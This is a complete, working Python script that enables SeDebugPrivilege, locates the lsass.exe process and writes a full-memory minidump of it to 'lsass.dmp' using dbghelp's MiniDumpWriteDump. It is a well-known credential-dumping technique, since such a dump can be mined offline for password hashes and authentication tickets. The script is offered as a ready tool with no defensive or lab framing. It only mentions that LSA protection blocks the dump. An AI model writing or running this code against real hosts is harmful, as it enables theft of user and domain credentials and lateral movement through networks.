"""
Write a full-memory minidump of lsass.exe with dbghelp!MiniDumpWriteDump.

Requires an elevated (administrator) context whose token holds SeDebugPrivilege.
On hosts with LSA protection (RunAsPPL) enabled, OpenProcess on lsass.exe fails
with ERROR_ACCESS_DENIED from a non-protected process, and the dump is refused.
"""
import ctypes
from ctypes import wintypes
import os

import psutil
import win32api
import win32con
import win32file  # For CreateFile
import win32security

# MINIDUMP_TYPE flag for MiniDumpWriteDump and process access rights
MiniDumpWithFullMemory = 0x00000002
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1F0FFF

ERROR_NOT_ALL_ASSIGNED = 1300  # set by AdjustTokenPrivileges when a privilege is not held

# MiniDumpWriteDump lives in dbghelp.dll, which ships with Windows.
# use_last_error=True lets ctypes.get_last_error() return the error code of the
# failed call itself, before any other Win32 call can overwrite it.
dbghelp = ctypes.WinDLL("dbghelp", use_last_error=True)

# MiniDumpWriteDump function argument types
dbghelp.MiniDumpWriteDump.argtypes = [
    wintypes.HANDLE,  # hProcess
    wintypes.DWORD,   # ProcessId
    wintypes.HANDLE,  # hFile
    wintypes.DWORD,   # DumpType (MINIDUMP_TYPE)
    wintypes.LPVOID,  # ExceptionParam (can be NULL)
    wintypes.LPVOID,  # UserStreamParam (can be NULL)
    wintypes.LPVOID,  # CallbackParam (can be NULL)
]
dbghelp.MiniDumpWriteDump.restype = wintypes.BOOL  # Return type is BOOL


# Enable SeDebugPrivilege so that protected system processes such as LSASS can be opened
def enable_debug_privilege():
    try:
        privilege_luid = win32security.LookupPrivilegeValue(None, win32security.SE_DEBUG_NAME)
        token = win32security.OpenProcessToken(
            win32api.GetCurrentProcess(),
            win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERY,
        )
        win32security.AdjustTokenPrivileges(
            token, False, [(privilege_luid, win32security.SE_PRIVILEGE_ENABLED)]
        )
        # AdjustTokenPrivileges reports success even when the token does not hold
        # the privilege at all; the only indication is ERROR_NOT_ALL_ASSIGNED.
        if win32api.GetLastError() == ERROR_NOT_ALL_ASSIGNED:
            print("SeDebugPrivilege is not held by this token (run from an elevated context).")
            return False
        print("SeDebugPrivilege enabled.")
        return True
    except win32api.error as e:
        print(f"Failed to enable SeDebugPrivilege: {e}")
        return False


# Function to find the LSASS process
def get_lsass_pid():
    try:
        # Requesting the attributes up front makes psutil swallow AccessDenied
        # for processes it cannot query, so no per-process try/except is needed.
        for proc in psutil.process_iter(["pid", "name"]):
            if (proc.info["name"] or "").lower() == "lsass.exe":
                print(f"Found LSASS process: PID = {proc.pid}")
                return proc.pid
    except Exception as e:
        print(f"Error accessing processes: {e}")
    return None


# Function to write a minidump of the LSASS process
def write_lsass_minidump(output_path):
    pid = get_lsass_pid()
    if not pid:
        print("LSASS process not found.")
        return False

    # Open the LSASS process. pywin32 raises on failure rather than returning a
    # NULL handle, so the error has to be caught, not tested with "if not h_process".
    # PROCESS_ALL_ACCESS is kept from the original; MiniDumpWriteDump itself is
    # documented to need only PROCESS_QUERY_INFORMATION | PROCESS_VM_READ.
    try:
        h_process = win32api.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    except win32api.error as e:
        print(f"Failed to open LSASS process with PID {pid}: {e}")
        return False

    # Create the dump file using win32file (also raises on failure)
    try:
        h_file = win32file.CreateFile(
            output_path,
            win32con.GENERIC_WRITE,
            0,  # no sharing
            None,
            win32con.CREATE_ALWAYS,
            win32con.FILE_ATTRIBUTE_NORMAL,
            None,
        )
    except win32api.error as e:
        print(f"Failed to create dump file: {e}")
        win32api.CloseHandle(h_process)
        return False

    try:
        # PyHANDLE objects are not ctypes types; convert them to raw HANDLE values
        h_process_ctypes = wintypes.HANDLE(int(h_process))
        h_file_ctypes = wintypes.HANDLE(int(h_file))

        # Call MiniDumpWriteDump to write the full-memory minidump to the file
        success = bool(
            dbghelp.MiniDumpWriteDump(
                h_process_ctypes,        # Process handle
                pid,                     # Process ID
                h_file_ctypes,           # File handle
                MiniDumpWithFullMemory,  # Dump type
                None,                    # Exception parameter (NULL)
                None,                    # User stream parameter (NULL)
                None,                    # Callback parameter (NULL)
            )
        )
        if success:
            print(f"Minidump written successfully to {output_path}")
        else:
            print(f"Failed to write minidump for LSASS. Error: {ctypes.get_last_error()}")
    finally:
        # Always release both handles, even if the dump call failed
        win32file.CloseHandle(h_file)
        win32api.CloseHandle(h_process)

    return success


if __name__ == "__main__":
    # Enable SeDebugPrivilege before writing the minidump
    enable_debug_privilege()

    # Specify the path for the minidump file
    dump_file_path = os.path.join(os.getcwd(), "lsass.dmp")

    # Write the minidump
    if write_lsass_minidump(dump_file_path):
        print("Minidump operation completed.")
    else:
        print("Minidump operation failed.")